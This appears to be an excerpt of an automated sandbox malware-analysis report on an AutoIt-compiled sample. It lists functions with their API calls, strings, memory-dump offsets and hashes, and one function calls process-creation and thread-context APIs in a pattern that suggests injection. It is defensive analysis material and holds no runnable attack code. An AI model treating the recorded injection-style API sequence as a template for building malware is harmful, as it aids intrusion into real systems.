String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: dcfe1ba2ab149b43f3b9f263553de451828c013c14f2dbd33ab21b73f505cd46
Instruction ID: 66a34e7d2013d5818167099805aaf074ad9c6704e35e2530e4708e6eb896863f
Opcode Fuzzy Hash: dcfe1ba2ab149b43f3b9f263553de451828c013c14f2dbd33ab21b73f505cd46
Instruction Fuzzy Hash: 5FA14F7290021D9ACF14EBA0DC95AEEB7F8FF15750F8404AAF416B7191EF745A88CB60

Function 04102650 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04102721
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04102947

Memory Dump Source

Source File: 00000000.00000002.1376585678.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_AuKUol8SPU.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
Instruction ID: cce493708e16c87b71402624bcfaabd4d2132d347df183e7c4ae569d086e847e
Opcode Fuzzy Hash: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
Instruction Fuzzy Hash: F4A10774E40209EBDB24CFA4C898BEEB7B5BF48304F208199E515BB2C0D7B5AE45DB54

Function 00B139D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B13A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B13A24
ShowWindow.USER32(00000000,?,?), ref: 00B13A38
ShowWindow.USER32(00000000,?,?), ref: 00B13A41

Strings

AutoIt v3, xrefs: 00B139FB, 00B13A00, 00B13A01
edit, xrefs: 00B13A1E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: c4995bb8be825d0351000cbd6b84cec6097feb1dc4678758b68599d45636f590
Instruction ID: a29f991c0db2d1d07c4d6992294f7150daae9069acdd1329b33858f1c7f00912
Opcode Fuzzy Hash: c4995bb8be825d0351000cbd6b84cec6097feb1dc4678758b68599d45636f590
Instruction Fuzzy Hash: D2F03A716026907EEA305B636C58E7B6F7DD7C6F60B00402BB900E3170DA650804CAB4

Function 041023B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 170
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 041022A0: Sleep.KERNELBASE(000001F4), ref: 041022B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0410253F

Strings

V8MIA388YREDKFUHW0GPZFHDZ0GCFC, xrefs: 041025AB, 041025AE

Memory Dump Source

Source File: 00000000.00000002.1376585678.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_AuKUol8SPU.jbxd

Similarity

API ID: CreateFileSleep
String ID: V8MIA388YREDKFUHW0GPZFHDZ0GCFC
API String ID: 2694422964-4294116424
Opcode ID: 3c3517010ef718a7652074385b626f36f3b8b1049fbda0fe2a5a464f699334f9
Instruction ID: d152319eb3089abf8f844a64a1fd5f57a5d34e21408e03266fbbc817d652e458
Opcode Fuzzy Hash: 3c3517010ef718a7652074385b626f36f3b8b1049fbda0fe2a5a464f699334f9
Instruction Fuzzy Hash: 82719470D14288DAEF11DBE4D858BDEBB759F15304F008199E648BB2C0D7BA1B49CB6A

Function 00B1407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B4D3D7

Part of subcall function 00B17BCC: _memmove.LIBCMT ref: 00B17C06

_memset.LIBCMT ref: 00B140FC
_wcscpy.LIBCMT ref: 00B14150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B14160

Strings

Line: , xrefs: 00B4D400

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 63a0ac5d4e3b4a3bd20f217c86e3b403c46b1c0fa7fb86dc490321b1ffe2d842
Instruction ID: 80ec805a7458c10ed449a71ee77e6d1e37867d6ff2a8a55e381b45a8d0c07bec
Opcode Fuzzy Hash: 63a0ac5d4e3b4a3bd20f217c86e3b403c46b1c0fa7fb86dc490321b1ffe2d842
Instruction Fuzzy Hash: 6331B271008305AAD330EB60DC45FDB77E8EF44310F5045ABF585931A1EF709689C796

Function 00B3541D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00B3547B
_memcpy_s.LIBCMT ref: 00B354ED
__read_nolock.LIBCMT ref: 00B3554B
__filbuf.LIBCMT ref: 00B3556E
_memset.LIBCMT ref: 00B355B2

Part of subcall function 00B38B28: __getptd_noexit.LIBCMT ref: 00B38B28

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 88a5b77c5a767ed92794217fb58aa61996f84dcb5d26f55d0530b45105ed8bbf
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: 1951D470A00B05DBDB389FA9D88066E77F2EF50321F3487A9F825962D4D771EE908B41

Function 00B1686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00B14DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B14E0F

_free.LIBCMT ref: 00B4E263
_free.LIBCMT ref: 00B4E2AA

Part of subcall function 00B16A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B16BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00B4E039
Bad directive syntax error, xrefs: 00B4E292

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: ee80cea90b5eec2942a086c9e6a66793d10e43e0520d74cae163548ef942a51f
Instruction ID: a34856529bae282bd1090f44a5ac7898d64eb32dc637c1a195e5d04f68b26805
Opcode Fuzzy Hash: ee80cea90b5eec2942a086c9e6a66793d10e43e0520d74cae163548ef942a51f
Instruction Fuzzy Hash: 58916B71910219AFCF14EFA4DC919EDB7F8FF08310B5444AAF825AB2A1DB70EA45DB50

Function 00B135B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B135A1,SwapMouseButtons,00000004,?), ref: 00B135D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B135A1,SwapMouseButtons,00000004,?,?,?,?,00B12754), ref: 00B135F5
RegCloseKey.KERNELBASE(00000000,?,?,00B135A1,SwapMouseButtons,00000004,?,?,?,?,00B12754), ref: 00B13617

Strings

Control Panel\Mouse, xrefs: 00B135D2

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 2aa8d91605e01bc4572f027b64df545e527d474cc40bdc75283d698bc1397f53
Instruction ID: c8d6395171123482f63a8a39e80a17a3dcadef87d366402c2bea3f1619ce4b4f
Opcode Fuzzy Hash: 2aa8d91605e01bc4572f027b64df545e527d474cc40bdc75283d698bc1397f53
Instruction Fuzzy Hash: CB114871614208BFDB208F64DC809FEB7FCEF44B50F4084AAE805D7210E6719E949760

Function 041012A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 04101A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04101AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04101B13

Memory Dump Source

Source File: 00000000.00000002.1376585678.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_AuKUol8SPU.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 0c646410c49af0b74529604b878ce189fa63dfca3f29238f0a7aaa8c198f6bc1
Instruction ID: 5eed260517469c21c4cabcd34da4db9e3bad83995a7eac17c661ab8d21768984
Opcode Fuzzy Hash: 0c646410c49af0b74529604b878ce189fa63dfca3f29238f0a7aaa8c198f6bc1
Instruction Fuzzy Hash: 8862EE30A14258DBEB24CFA4C854BDEB375EF58700F1091A9D10DEB2D4E7BA9E81CB59

Function 00B7955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00B14EE5: _fseek.LIBCMT ref: 00B14EFD

Part of subcall function 00B79734: _wcscmp.LIBCMT ref: 00B79824
Part of subcall function 00B79734: _wcscmp.LIBCMT ref: 00B79837

_free.LIBCMT ref: 00B796A2
_free.LIBCMT ref: 00B796A9
_free.LIBCMT ref: 00B79714

Part of subcall function 00B32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00B39A24), ref: 00B32D69
Part of subcall function 00B32D55: GetLastError.KERNEL32(00000000,?,00B39A24), ref: 00B32D7B

_free.LIBCMT ref: 00B7971C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: abe6630be4f2892b2f8e47860992b29da05ea67bdfeab89f1ef48021fbe1c962
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 1E513CB1904258AFDF249F64CC85A9EBBB9EF48300F1044EEF61DA7241DB715A81CF58

Function 00B3470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B347A0
__flush.LIBCMT ref: 00B347C0
__write.LIBCMT ref: 00B347F3
__flsbuf.LIBCMT ref: 00B34821

Part of subcall function 00B38B28: __getptd_noexit.LIBCMT ref: 00B38B28

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 43fdf1070a460220710c2290a1e9516a0a34607a086fd4e9f736de192bb2e4c4
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 86419275B00746EBDB288E69C8809AE7BE5EF46360F3485FDE81587640EB70FD418B40

Function 00B17285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B4EA39
GetOpenFileNameW.COMDLG32(?), ref: 00B4EA83

Part of subcall function 00B14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B14743,?,?,00B137AE,?), ref: 00B14770

Part of subcall function 00B30791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B307B0

Strings

X, xrefs: 00B4EA51

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: b0d51638810b734d7ad982ba9668a844e9f333babe53a0d0989b088477ee686f
Instruction ID: 7ac4fea623ba7912193ee6acd2ee353005268ba398ad803b4682e1195cd3368d
Opcode Fuzzy Hash: b0d51638810b734d7ad982ba9668a844e9f333babe53a0d0989b088477ee686f
Instruction Fuzzy Hash: 5421D571A042589BCF01DF98C845BEE7BF8AF49314F00409AE408FB241DFB459898FA1

Function 00B78D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B78DAC
__fread_nolock.LIBCMT ref: 00B78DC1

Strings

EA06, xrefs: 00B78DF3

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 40d745e11b873ca8549af2ac76024123d6e00e894a1862da2df43ddd53e33094
Instruction ID: cce2bd8988f721e2d4b1ab85a06481ec8bb475f8b0046fc50384e21970371fc5
Opcode Fuzzy Hash: 40d745e11b873ca8549af2ac76024123d6e00e894a1862da2df43ddd53e33094
Instruction Fuzzy Hash: 7401F971D442187EDB28CAA8C856EEE7BF8DB11301F0041DEF556D2181E874A6048760

Function 00B798E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00B798F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B7990F

Strings

aut, xrefs: 00B79909

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 8055753dcb9ef9b47c7661c223e36db28e3d1c8c077fe840c3a8785f5b262366
Instruction ID: d41d2ff766cef6c804acd456bdc93f0d2223e21924ac97fecf6dc6bef5e21d1d
Opcode Fuzzy Hash: 8055753dcb9ef9b47c7661c223e36db28e3d1c8c077fe840c3a8785f5b262366
Instruction Fuzzy Hash: B8D05E7994030EABDB509BA0DC0EFAA777CE704700F0002B2BA54D20A1EEB095988B91

Function 00B8CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7881da258f84d866824649a4864d41602b7d608722c280d968eb4b5e865bd521
Instruction ID: 97a2e676e49953053ee3d1fede853974848ad78aefae7ef659ee1b0f3629e9dd
Opcode Fuzzy Hash: 7881da258f84d866824649a4864d41602b7d608722c280d968eb4b5e865bd521
Instruction Fuzzy Hash: 59F15AB06083419FC714EF28C480A6ABBE5FF88314F5489AEF8999B351D730E945CF92

Function 00B1F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B30162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B30193
Part of subcall function 00B30162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B3019B
Part of subcall function 00B30162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B301A6
Part of subcall function 00B30162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B301B1
Part of subcall function 00B30162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B301B9
Part of subcall function 00B30162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B301C1

Part of subcall function 00B260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00B1F930), ref: 00B26154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B1F9CD
OleInitialize.OLE32(00000000), ref: 00B1FA4A
CloseHandle.KERNEL32(00000000), ref: 00B545C8

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: e764f06c0c1ef3d2d38e76d4a8b9497808d71bfcb339a410cbcf9adb293dd5a0
Instruction ID: e32d0286bc1f879851ee79c12506ea705cb4274f2ad7841090cfa16b30584c62
Opcode Fuzzy Hash: e764f06c0c1ef3d2d38e76d4a8b9497808d71bfcb339a410cbcf9adb293dd5a0
Instruction Fuzzy Hash: 3D81BDB1907A408FC3A4DF29A961668FBE5FB593167A081BB9019CB369FF7044848F16

Function 00B1434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B14370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B14415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B14432

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: cb3e5df8fa99627f084444b8ce613c6ef44767021a90b68508ed6408ff16bef6
Instruction ID: 07947b2b53e8c8f2f8174746be79241ec3a01d30b484efa50ccabbc45ed64836
Opcode Fuzzy Hash: cb3e5df8fa99627f084444b8ce613c6ef44767021a90b68508ed6408ff16bef6
Instruction Fuzzy Hash: 7D318EB05057018FC721DF24D8846EBBBE8FB48309F40097EE59A83351EB70A988CB56

Function 00B3571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00B35733

Part of subcall function 00B3A16B: __NMSG_WRITE.LIBCMT ref: 00B3A192
Part of subcall function 00B3A16B: __NMSG_WRITE.LIBCMT ref: 00B3A19C

__NMSG_WRITE.LIBCMT ref: 00B3573A

Part of subcall function 00B3A1C8: GetModuleFileNameW.KERNEL32(00000000,00BD33BA,00000104,?,00000001,00000000), ref: 00B3A25A
Part of subcall function 00B3A1C8: ___crtMessageBoxW.LIBCMT ref: 00B3A308

Part of subcall function 00B3309F: ___crtCorExitProcess.LIBCMT ref: 00B330A5
Part of subcall function 00B3309F: ExitProcess.KERNEL32 ref: 00B330AE

Part of subcall function 00B38B28: __getptd_noexit.LIBCMT ref: 00B38B28

RtlAllocateHeap.NTDLL(016F0000,00000000,00000001,00000000,?,?,?,00B30DD3,?), ref: 00B3575F

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 1cc33c3965104c0fe733bce5dddb9edfea3a182ba9a5ede687dbeaec10ce2f1c
Instruction ID: 13395b655f685b7267ea364b99e47ec9311ad08d64c6bf28335c8fb9441537db
Opcode Fuzzy Hash: 1cc33c3965104c0fe733bce5dddb9edfea3a182ba9a5ede687dbeaec10ce2f1c
Instruction Fuzzy Hash: CA01D835241B12DAD6212B35EC92B6EB3C8DF42B61F3005B6F515EB1D2EE709C014662

Function 00B798A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

